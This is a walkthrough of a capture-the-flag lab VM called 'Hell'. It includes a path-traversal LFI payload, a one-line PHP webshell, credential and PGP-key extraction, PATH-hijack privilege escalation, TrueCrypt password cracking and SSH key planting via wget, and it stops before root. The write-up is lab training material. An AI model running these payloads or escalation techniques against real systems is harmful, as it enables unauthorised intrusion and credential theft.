“This VM is designed to try and entertain the more advanced information security enthusiast. This doesn’t exclude beginners however and I’m sure that a few of you could meet the challenge. There is no ‘one’ focus on the machine, a range of skills such as web exploitation, password cracking, exploit development, binary examination and most of all logical thinking is required to crack the box in the intended way - but who knows there might be some short cuts!
A few of the skills needed can be seen in some posts on http://netsec.ws. Otherwise enjoy the experience - remember that although vulnerabilities might not jump out at you straight away you may need to try some variations on the normal to get past the protections in place!“ – Peleus
More information and OVA file download please check here.
Attacker & Target
Attacker: Kali Linux (10.10.10.131/24)
Target: Hell (10.10.10.146/24)
Vulnerability & Exploit
Local File Include vulnerability existed in one of cookie variable
File upload function without any content filter will save any evil code into pre-defined file ‘note.txt’ under folder ‘/tmp/’
Sensitive information found in ‘login.php’ which disclose jack’s SSH password and Database password
Use jack’s PGP private key file to unlock the encrypted email file and found SSH password for another account ‘milk_4_life’
‘game’ program has sticky bit set and will call another program ‘chmod’ when user win the game, but it has not been using absolute path for ‘chmod’
‘Rockyou’ dictionary based brute force attacking and cracked the password for ‘Truecrypt’ container file found in george’s home folder, found SSH private key file for another account ‘bazza’
Very similar vulnerability as in ‘game’ happened in another program ‘part2’ which can be expolited to privilege escape to ‘oj’
‘echo’ program has Format String vulnerability which should be able to be exploited to get ROOT
‘Truecrypt’ has vulnerability which can make attacker to get ROOT
Method
Scanned the network to discover the target server [Net Discover]
Port scanned the target to discover the running services and open ports [nmap]
Web information gathering and interacting with the web server [firefox, burp proxy]
brute fuzz to find hidden files and paths [wfuzz]
Local file including vulnerability detect and exploit [curl]
Truecrypt password brute force attacking [truecrack]
Analysis and write script to win ‘game’ program [python]
Poked around in the file system and found sensitive information
Hijack executable program to get privilege escalation
Make evil truecrypt file to get ROOT
Tools
All the tools used here can be found in Kali Linux
Using netdiscover as routine to detect the target’s IP address (10.10.10.146 in this case).
123456789101112
root@kali:~# netdiscover -r 10.10.10.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor
-----------------------------------------------------------------------------
10.10.10.1 00:50:56:c0:00:08 01 060 VMWare, Inc.
10.10.10.2 00:50:56:e2:f9:10 01 060 VMWare, Inc.
10.10.10.146 00:0c:29:e2:78:6f 01 060 VMware, Inc.
10.10.10.254 00:50:56:fb:67:d4 01 060 VMWare, Inc.
10.10.10.146 is our Target!
Next, run nmap to scan open services on the target.
12345678910111213141516171819202122232425262728
root@kali:~# nmap -sV -O -A -p- -T5 10.10.10.146
Starting Nmap 6.47 ( http://nmap.org ) at 2015-07-13 08:24 EDT
Nmap scan report for 10-10-10-146.tpgi.com.au (10.10.10.146)
Host is up (0.00044s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u1 (protocol 2.0)
| ssh-hostkey:
| 1024 f4:bb:f4:22:36:08:61:ef:74:2c:27:e0:b4:a2:69:d3 (DSA)
| 2048 0e:31:1d:cf:04:d0:63:fa:5c:76:f2:dc:22:1c:f1:7c (RSA)
|_ 256 e0:b0:ba:37:93:39:65:33:c6:44:99:50:2c:1b:f6:fa (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Debian))
|_http-methods: GET HEAD POST OPTIONS
| http-robots.txt: 2 disallowed entries
|_/personal/ /super_secret_login_path_muhahaha/
|_http-title: Have fun!
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 44490/tcp status
|_ 100024 1 52715/udp status
666/tcp open doom?
1337/tcp filtered waste
44490/tcp open status 1 (RPC #100024)
...
ports 22 and 80 open, and two very interesting folders found on port 80: \personal and \super_secret_login_path_muhahaha\. Then using wfuzz to reveal more possible hidden folders and files:
root@kali:~# wfuzz -c --hc 404 -z file,/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt http://10.10.10.146/super_secret_login_path_muhahaha/FUZZ.php
********************************************************
* Wfuzz 2.0 - The Web Bruteforcer *
********************************************************
Target: http://10.10.10.146/super_secret_login_path_muhahaha/FUZZ.php
Payload type: file,/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt
Total requests: 81643
==================================================================
ID Response Lines Word Chars Request
==================================================================
00001: C=200 17 L 33 W 371 Ch " - #"
00002: C=200 17 L 33 W 371 Ch " - # directory-list-lowercase-2.3-small.txt"
00003: C=200 17 L 33 W 371 Ch " - # Copyright 2007 James Fisher"
00004: C=200 17 L 33 W 371 Ch "on-Share Alike 3.0 License. To view a copy of this"
00005: C=200 17 L 33 W 371 Ch "# This work is licensed under the Creative Commons"
00006: C=200 17 L 33 W 371 Ch "sit http://creativecommons.org/licenses/by-sa/3.0/"
00007: C=200 17 L 33 W 371 Ch " - #"
00008: C=200 17 L 33 W 371 Ch " - #"
00009: C=200 17 L 33 W 371 Ch " Suite 300, San Francisco, California, 94105, USA."
00010: C=200 17 L 33 W 371 Ch "ed case insensative list, where entries were found"
00011: C=200 17 L 33 W 371 Ch " - # on atleast 3 different hosts"
00012: C=200 17 L 33 W 371 Ch "d a letter to Creative Commons, 171 Second Street,"
00016: C=403 10 L 30 W 317 Ch " - "
00017: C=200 17 L 33 W 371 Ch " - index"
00028: C=200 17 L 33 W 371 Ch " - #"
00063: C=302 0 L 0 W 0 Ch " - login"
00193: C=200 5 L 19 W 163 Ch " - mail"
00198: C=200 2 L 2 W 19 Ch " - users"
00470: C=302 17 L 35 W 387 Ch " - personal"
00572: C=200 7 L 21 W 170 Ch " - server"
01051: C=200 5 L 20 W 179 Ch " - notes"
01255: C=302 1 L 0 W 2 Ch " - check"
05186: C=302 21 L 38 W 566 Ch " - panel"
Stopping...
After I checked those revealed files, I found three interesting ones: 1.php, check.php and notes.php.
Having a look at 1.php, there is only one sentence: INTRUDER ALERT! which is in Red color and all Capital.
By playing check.php with Burp proxy, I noticed that if user input wrong username/password, the cookie variable failcount will increase. However when input the wrong username/password more than 3 times, a new cookie intruder will be added and the value is always 1.
Also the check.php will request personal.php and panel.php as well, something noticeable in panel.php is that the red color alert: INTRUDER ALERT! which is same as the content of 1.php.
So based on the above facts and analysis, I could guess that the panel.php has included the 1.php when user input wrong username/password over 3 times. As a result, I firstly modified the cookie value of intruder to ../../../../etc/passwd but the respond is not excepted… might be the admin set a filter here or something like that. After I read the page in OWASP testing guide, I finally found a well-working payload: ....//....//....//....//....//....//etc//passwd.
Here is a Local File Include vulnerability found.
Now it’s time to move to notes.php.
Taking a close look at notes.php, I noticed that we can write anything and it will be saved in temporary folder(mostly possible is /tmp/ in Linux) as the name is note.txt.
After some trying, it is proved that the note.txt file is saved in /tmp/ folder.
Then I wrote one-line PHP webshell to note.txt, then use File Include vulnerability found previously to include the webshell.
1
<?phpsystem($_GET['cmd']);?>
Now I have already got a webshell and can run system command which is ready to poke around on the server file system.
In order to make the life easier, I use curl instead of burp proxy to interactive with target server.
First to request check.php, we can see that cookies PHPSESSID and failcount have been set.
root@kali:~# ssh jack@10.10.10.146
jack@10.10.10.146's password:
Linux hell 3.2.0-4-486 #1 Debian 3.2.57-3+deb7u2 i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
No mail.
Last login: Sun Jul 12 05:12:42 2015 from 10.10.10.131
$ id
uid=1001(jack) gid=1001(jack) groups=1001(jack)
$ pwd
/home/jack
$ ls -l
total 4
drwx------ 2 jack jack 4096 Jun 18 2014 g0tmi1k_pics
$ ls -l g0tmi1k_pics
total 284
-rwx------ 1 jack jack 180289 Dec 1 2010 1.jpg
-rwx------ 1 jack jack 29494 Sep 12 2013 2.jpg
-rwx------ 1 jack jack 72070 Jun 18 2014 3.jpg
$ ls -lah
total 32K
drwx------ 5 jack jack 4.0K Jul 12 05:28 .
drwxr-xr-x 7 root root 4.0K Jul 5 2014 ..
-rwx------ 1 jack jack 1 Jun 22 2014 .bash_logout
-rwx------ 1 jack jack 3.4K Jun 18 2014 .bashrc
drwx------ 2 jack jack 4.0K Jun 18 2014 g0tmi1k_pics
drwx------ 2 jack jack 4.0K Jul 12 05:30 .gnupg
drwx------ 2 jack jack 4.0K Jun 18 2014 .pgp
-rwx------ 1 jack jack 675 Jan 1 2013 .profile
$ cd .pgp
$ ls -lah
total 20K
drwx------ 2 jack jack 4.0K Jun 18 2014 .
drwx------ 5 jack jack 4.0K Jul 12 05:28 ..
-rwx------ 1 jack jack 39 Jun 18 2014 note
-rwx------ 1 jack jack 1.8K Jun 18 2014 pgp.priv
-rwx------ 1 jack jack 890 Jun 18 2014 pgp.pub
$ cat note
The usual password as with everything.
$ cat pgp.priv
-----BEGIN PGP PRIVATE KEY BLOCK-----
Version: BCPG C# v1.6.1.0
lQOsBFOg9v8BCACbr++BXlL9e4N6pzcrHkNZGANB7Ii3vHc0Nj37kCm7ZuTMx4LN
bpWrqGb9W9grS9YQ7xSEkBShaKlWMilb4rqrM/tmDyuGt9UozCrVrCTfaZdPl72o
u1QO1DxTT9/iFwlb6AAjTvJGQQx92PQeShEOeTtycH+Xz4tx1ezHpbA4HK9ijftR
lyZy+y9GPSqYLsIU3N8WtnrTJRfSMiU/AGv/GWpykp3tlHjIL0YSHfvUppe4xAil
54J+LN7se3jKuFcRM+i9TF08hsTtM6azl7X4yyEDhHcvWgFY/vyggEwe6/ZP1IKG
zzAWi0sx7tlZLxyr9AFSXLwLvbhUpR3M5rJBABEBAAH/AwMC8ht700SVD+1guMSO
NKMnwLvKkrmW32b/zo/x4g4MbhUs1BXIvHfGw1ArsEpkMucb8utDqGzcwctR00de
jTr/nFo0gKxBMgc34e9HNTI0iFlVYWDFZqU4ie6/Pyt8qvZHOe5Aq0qPsCkcdMME
bR6EQng1ZBXX7zHCF2TobPnIxp5CGI2WUwXmXaGQS/hRriIcAhDx5ZFFqOdVQWES
mLo5Rd205/M4mungbUvwrHayu6ZGume+VXs630YaacNiBFpXnPDfKOCipZ+EhYsz
7febMxXj3mANwLXQfyTZOIXPzMptE11fbDA8jpy9m0vMy5ZCpJnp/VoTaaUxMz45
OeUI9nKTx9P1lGPC9hYidshg3Sg5Iz/qqmL/byAv1bUV2YOdJlAS1XY9Jj/wNrYz
yG9ASw5nfp0ChhLYnnU4dgfEk5bajGvgnhZAlb/+yNvJ5eUcwivjFC8jJUwlrZ+Z
oj1XAC4148JsjcQHW1d7yONc4iI7tSubMNa5GfBal1BxMRLP3nSZ4ICl67gTjrKH
ztiMKAefip3ywnRomfn7q9raJQ8TsKp0+REVy05mhZMZ1AdMlZzhTz8cYy8II6yr
qSxuJARfJ95FGYPrASMfJ+aZfPNk5RDnH5d92vxm/nIWexdayZqqQJG4MzOhtrjx
a0YouqQhxvD2aKslEBJ1S/D4D40xkVI+oaI+aM/6X+XzC2XVJgm7G8FvmtE09BUm
fAMUxE/bgsv33QXsURtelfuoZRLz/OmwybXpwv+Zen0n8hpjQEAOhqD4eieIxH9j
7W6ijInh9XD8jcnUa4eHw7WDa0LPtyQSbPZB1hZou6z8pAZY0LxhmstpPjSYfdKR
HRjhRuu0tdZ2PrKx1wKooo/iiJdZ0Cgizlu4k76rDrQSamFja0Bjb3dsb3ZlcnMu
Y29tiQEcBBABAgAGBQJToPb/AAoJEL26wSU/GKsKnk0H/iWvOGuWwge8VteqxPip
yu2LwvLzjbHAeWwBmsg69h+Yl5l8Y+3B9aoCpnjM2QmMAFHxVA8L6Z4UIyhNJ90Y
l18rYZec9cDUrflowd/A4QVrJNCV/5kCyPeQ03mzGHnlTTvb/qBMymmpVBeP3JoK
vZkGYzFBmrt7q19b3VcvexLTwtLtch8NUOt6719UFRvxE+EXu4JbItr7dSqfYDbh
zHsfGaeU1hCQJg/n83IRxTBsc7h1jIOxraovzbErqpZ6YeYhCK5oo38dJVpz9Daa
quU6lGTizKWX3HS29HQl+PJvzoHyj3T6Aw71BZF4lZNrJmzxHqhVYuRWptioyTWo
tqg=
=SCkw
-----END PGP PRIVATE KEY BLOCK-----
$
After poking around, I found .pgp hidden folder which include PGP private key and public key in jack’s home directory, take a note and will be used later.
Moving to milk_4_life
Then I was trying to login to MYSQL database and found jack’s web admin password is g0tmi1k69
$ mysql -uwww-data -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 37
Server version: 5.5.37-0+wheezy1 (Debian)
Copyright (c) 2000, 2014, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| website |
+--------------------+
2 rows in set (0.01 sec)
mysql> use website
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+-------------------+
| Tables_in_website |
+-------------------+
| users |
+-------------------+
1 row in set (0.00 sec)
mysql> select * from users;
+----------+-----------+
| username | password |
+----------+-----------+
| Jack | g0tmi1k69 |
+----------+-----------+
1 row in set (0.00 sec)
mysql>
Then I found there is an email for jack but it is encrypted by PGP, so I need using pgp private key (which is found before) to decrypt the message. Here is a handy gpg help guide.
$ ls -alh /var/mail
total 16K
drwxrwsr-x 4 root mail 4.0K Jul 15 09:25 .
drwxr-xr-x 12 root root 4.0K Jun 17 2014 ..
drwxr-sr-x 2 george george 4.0K Jun 20 2014 george
drwxr-sr-x 3 jack jack 4.0K Jul 5 2014 jack
$ ls -alh /var/mail/jack
total 12K
drwxr-sr-x 3 jack jack 4.0K Jul 5 2014 .
drwxrwsr-x 4 root mail 4.0K Jul 15 09:25 ..
drwxr-sr-x 2 root mail 4.0K Jun 18 2014 received
$ ls -alh /var/mail/jack/received
total 12K
drwxr-sr-x 2 root mail 4.0K Jun 18 2014 .
drwxr-sr-x 3 jack jack 4.0K Jul 5 2014 ..
-rw-r--r-- 1 root mail 709 Jun 18 2014 message.eml
$ cat /var/mail/jack/received/message.eml
-----BEGIN PGP MESSAGE-----
Version: BCPG C# v1.6.1.0
hQEMA726wSU/GKsKAQf/ZnGxyaHQ6wMhSzpbn2J2uVKoPFS3tHdnBzJ18kswBwOm
yff3Joe5RTtMgdjydD+37DSg6SikjcdzJiHV3y5QHqxVcNt5xo0BdYNCWoqjdMzJ
3g50VEwMg5DZwLvTmUr4f+CJ7bc/Cv2hHazKXnT7s71lqBLSCCsNwZuWpxYW1OMX
7CNE92QXayltmQ0GLajIMtzmGlszgwQkVjQ2h9wMGelVYHi5hYsEZzIdh6/9Jo24
rerlq1CY6/T70KsY6GyBoU3iKFgsIkwcb6whrlR/6SCK2vNmLlz2AfDSITYY+6vZ
MWXhiYbZSRyHq7gaYRKS6kzG6uLlsyq4YnQzhz8M+sm4dePDBvs7U6yAPJf4oAAH
9o01Fp3IJ1isvVMH5Fr8MwQjOAuo6Yh6TwbOrI/MVpphJQja8gDKVYr2tlqNS5me
V8xJ7ZUxsh67w/5s5s1JgEDQt+f4wckBc8Dx5k9SbS9iRUbZ0oLJ3IM8cUj3CDoo
svsh0u4ZWj4SrLsEdErcNX6gGihRl/xs3qdVOpXtesSvxEQcWHLqtMY94tb29faD
+oQPjG3V4cSY5r566esUAlCn7ooYyx6Dug==
=svWU
-----END PGP MESSAGE-----
$ gpg --allow-secret-key-import --import .pgp/pgp.priv
gpg: key 3F18AB0A: secret key imported
gpg: key 3F18AB0A: "jack@cowlovers.com" not changed
gpg: Total number processed: 1
gpg: unchanged: 1
gpg: secret keys read: 1
gpg: secret keys imported: 1
$ gpg /var/mail/jack/received/message.eml
You need a passphrase to unlock the secret key for
user: "jack@cowlovers.com"
2048-bit RSA key, ID 3F18AB0A, created 2014-06-18
gpg: WARNING: cipher algorithm CAST5 not found in recipient preferences
gpg: encrypted with 2048-bit RSA key, ID 3F18AB0A, created 2014-06-18
"jack@cowlovers.com"
gpg: /var/mail/jack/received/message.eml: unknown suffix
Enter new filename [text.txt]:
gpg: WARNING: message was not integrity protected
$ cat text.txt
Ok Jack. I've created the account 'milk_4_life' as per your request. Please stop emailing me about this now or I'm going to talk to HR like we discussed.
The password is '4J0WWvL5nS'
$
Here we got user milk_4_life has password: 4J0WWvL5nS
$ ssh milk_4_life@localhost
The authenticity of host 'localhost (::1)' can't be established.
ECDSA key fingerprint is e0:b0:ba:37:93:39:65:33:c6:44:99:50:2c:1b:f6:fa.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'localhost' (ECDSA) to the list of known hosts.
milk_4_life@localhost's password:
Linux hell 3.2.0-4-486 #1 Debian 3.2.57-3+deb7u2 i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Jul 12 07:02:03 2015 from 10.10.10.131
$ id
uid=1002(milk_4_life) gid=1002(milk_4_life) groups=1002(milk_4_life)
$ pwd
/home/milk_4_life
$ ls -l
total 12
---s--x--x 1 george george 5743 Jun 19 2014 game
-rwxr-xr-x 1 milk_4_life milk_4_life 473 Jul 11 20:36 win.py
$ ls -alh
total 36K
drwx------ 2 milk_4_life milk_4_life 4.0K Jul 12 06:59 .
drwxr-xr-x 7 root root 4.0K Jul 5 2014 ..
-rw------- 1 milk_4_life milk_4_life 51 Jul 12 07:24 .bash_history
-rwx------ 1 milk_4_life milk_4_life 1 Jun 22 2014 .bash_logout
-rwx------ 1 milk_4_life milk_4_life 3.4K Jan 1 2013 .bashrc
---s--x--x 1 george george 5.7K Jun 19 2014 game
-rwx------ 1 milk_4_life milk_4_life 675 Jan 1 2013 .profile
Moving to george
Here we can see that there is program game which is owned by george and sticky bit has been set. That means this program has high possibility to be exploited for privilege escaping to george.
After I run the game program and check listening ports, I found game is listening on port 1337.
123456789101112131415161718192021222324
$ telnet 127.0.0.1 1337
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
Type 'START' to begin
START
Starting...
You have 30 seconds to get as many points as you can, beat the high score! (High Score: 133723)
Quick what's... 769 x 49? 48
Quick what's... 413 x 17? 15
Quick what's... 779 x 106? 45
Quick what's... 439 x 803? 55
Quick what's... 555 x 341? 821
Quick what's... 976 x 1?
Lol nope
Final Score: 0
Connection closed by foreign host.
[1] + Done ./game
$
In order to win the game, I wrote a python script to calculate and send the result back to program.
#!/usr/bin/pythonimportsocketimportreip="127.0.0.1"port=1337s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)conn=s.connect((ip,port))res=s.recv(1024)printress.send('START/n')res=s.recv(1024)printreswhileTrue:res=s.recv(1024)data=re.findall(r"Quick what's\.\.\. (.*)\?",res)ifnotdata:print"pattern is not found!"printresbreakelse:(a,b)=data[0].split(' x ')rst=int(a)*int(b)printrsts.send(str(rst)+'\n')print'[*] Done!'s.close()
After running the script and win the game, something new appeared I hear the faint sound of chmodding......... That sounds like command chmod has been called after win the game.
Now I decided to check if the command chmod is called from absolute path or not. I upload setuid.c to target server’s temporary directory /tmp/, compile it and change the name to chmod.
Bingo! I am george now. After poking around in the file system, I found container.tc file (which is a Truecrypt encrypted file) in george’s home directory. Also george has an email which shows a clue to crack the encrypted file by using rockyou password dictionary.
$ pwd
/home/george
$ ls -l
total 4096
-rw------- 1 george george 4194304 Jul 12 08:30 container.tc
$ find / -user george -perm -g=s -o -perm -u=s -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/pt_chown
/usr/sbin/exim4
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/procmail
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/sudoedit
/usr/bin/game.py
/usr/bin/lesson101
/sbin/mount.nfs
/var/mail/george
/bin/umount
/bin/ping
/bin/su
/bin/mount
/bin/ping6
$ ls -l /var/mail/george
total 4
-rw-r--r-- 1 george george 175 Jun 20 2014 signup.eml
$ cat /var/mail/george/signup.eml
From: admin@rockyou.com
To: super_admin@hell.com
Subject: Account Activation
Date: 13th November 2009
Thanks for signing up for your account. I hope you enjoy our services.
$
Then I downloaded the container file container.tc to my Kali and use truecrack with rockyou.txt to crack the password. Due to my laptop do not have a strong GPU so I could not take advantage of hashcat which is really disappointed. T.T
However, the hard way is still working, just a little slow… after waiting for a quite while, I finally cracked the password: letsyouupdateyourfunnotesandmore
In order to get a better shell with full privilege of george, I use ssh-keygen to generate a new ssh key pair (passphrase is test1337) and upload the public key to target server as .ssh/authorized_keys. Then use the private key to login via SSH.
123456789101112131415161718192021
root@kali:~# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): g_id_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in g_id_rsa.
Your public key has been saved in g_id_rsa.pub.
The key fingerprint is:
81:82:98:44:59:c7:f2:68:fe:b8:76:04:f1:b1:a2:97 root@kali
The key's randomart image is:
+--[ RSA 2048]----+
|.oo... |
|.+ +.o . |
|o . B + . |
| = = . |
| + + S |
| . E . |
| . + |
| o o |
| ..o |
+-----------------+
Now back to target server to create .ssh folder and pull the SSH private key from my Kali.
1234567891011121314151617181920212223
$ mkdir .ssh
$ cd .ssh
$ wget http://10.10.10.131/g_id_rsa.pub -O authorized_keys
--2015-07-16 10:19:59-- http://10.10.10.131/g_id_rsa.pub
Connecting to 10.10.10.131:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 391
Saving to: `authorized_keys'
100%[==================================================================================================>] 391 --.-K/s in 0s
2015-07-16 10:19:59 (59.7 MB/s) - `authorized_keys' saved [391/391]
$ ls
authorized_keys
$ ls -l
total 4
-rw-r--r-- 1 george milk_4_life 391 Jul 16 00:19 authorized_keys
$ /bin/chmod 600 authorized_keys
$ ls -l
total 4
-rw------- 1 george milk_4_life 391 Jul 16 00:19 authorized_keys
$
SSH login with password test1337
1234567891011121314151617181920
root@kali:~/hell# ssh george@10.10.10.146 -i g_id_rsa
Enter passphrase for key 'g_id_rsa':
Linux hell 3.2.0-4-486 #1 Debian 3.2.57-3+deb7u2 i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
No mail.
Last login: Thu Jul 16 10:14:43 2015 from 10.10.10.131
george@hell:~$ id
uid=1000(george) gid=1000(george) groups=1000(george),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev)
george@hell:~$ pwd
/home/george
george@hell:~$ ls -l
total 4096
-rw------- 1 george george 4194304 Jul 12 08:30 container.tc
george@hell:~$
After get into the truecrypt container, I found a RSA private key file which should be someone’s SSH key.
Then I download the SSH private key file to my Kali and try use it to login accounts found before.(only bazza and oj left)
123456789101112131415161718192021222324
root@kali:~/hell# ssh bazza@10.10.10.146 -i tr_id_rsa
Linux hell 3.2.0-4-486 #1 Debian 3.2.57-3+deb7u2 i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have mail.
Last login: Thu Jul 16 10:32:07 2015 from 10.10.10.131
$ id
uid=1004(bazza) gid=1004(bazza) groups=1004(bazza)
$ ls -alh
total 40K
drwx------ 3 bazza bazza 4.0K Jul 17 08:35 .
drwxr-xr-x 7 root root 4.0K Jul 5 2014 ..
-rw-r--r-- 1 root root 109 Jul 6 2014 barrebas.txt
-rw------- 1 bazza bazza 492 Jul 13 01:33 .bash_history
-r-xr-sr-x 1 oj developers 6.1K Jul 6 2014 part1
-r-sr-xr-x 1 oj oj 5.2K Jul 6 2014 part2
drwx------ 2 bazza bazza 4.0K Jul 5 2014 .ssh
-rw------- 1 bazza bazza 781 Jul 13 01:42 .viminfo
$
Moving to oj
Here we found executable program: part1 and part2 which has sticky bit set and owned by oj, so here should give a close check.
12345678910
$ ./part1
Checking integrity of part2... Done!!
Checking integrity of calling target... Done!!
Binary and target confirmed.
Can't touch this *nah na na na na naaaaaaaa nah*
uid=1004(bazza) gid=1004(bazza) euid=1005(oj) egid=1003(developers) groups=1005(oj),1004(bazza)
$
Here we can see that the running program has executed system command id. So very similar method used previously, I upload setuid.c and change it a little bit as follow and then gcc compile it to /tmp/id, then set environmental variable PATH to include /tmp at the beginning.
$ gcc baz2.c -o /tmp/id
$ ls -l /tmp
total 8
-rwxr-xr-x 1 bazza bazza 5028 Jul 17 08:26 id
$ ./part1
Checking integrity of part2... Done!!
Checking integrity of calling target... Done!!
Binary and target confirmed.
Can't touch this *nah na na na na naaaaaaaa nah*
uid=1004(bazza) gid=1004(bazza) euid=1005(oj) egid=1003(developers) groups=1005(oj),1004(bazza)
oj
$ whoami
oj
$ /usr/bin/id
uid=1004(bazza) gid=1004(bazza) euid=1005(oj) egid=1003(developers) groups=1005(oj),1004(bazza)
Now, I am oj. :D
1234567891011
$ whoami
oj
$ ls -al
total 592
drwx------ 2 oj oj 4096 Jul 17 23:48 .
drwxr-xr-x 7 root root 4096 Jul 5 2014 ..
-r-sr-xr-x 1 root root 592549 Jul 5 2014 echo
-rw-r--r-- 1 root root 154 Jul 5 2014 How to be an infosec rockstar 101.txt
$ ./echo AAAA-%p-%p
AAAA-0x80488c0-0xbffffce8$
$
Here I found one executable file owned by root under oj’s home folder and that file has sticky bit been set which could be a way to ROOT. Also echo program has Format String vulnerability
Getting ROOT
After suffering a lot of hours painful to deal with Format String exploit about echo. I still could not make it work for me :`(
However, there is another way to privilege escape to ROOT, which has been demostrated by vincius777
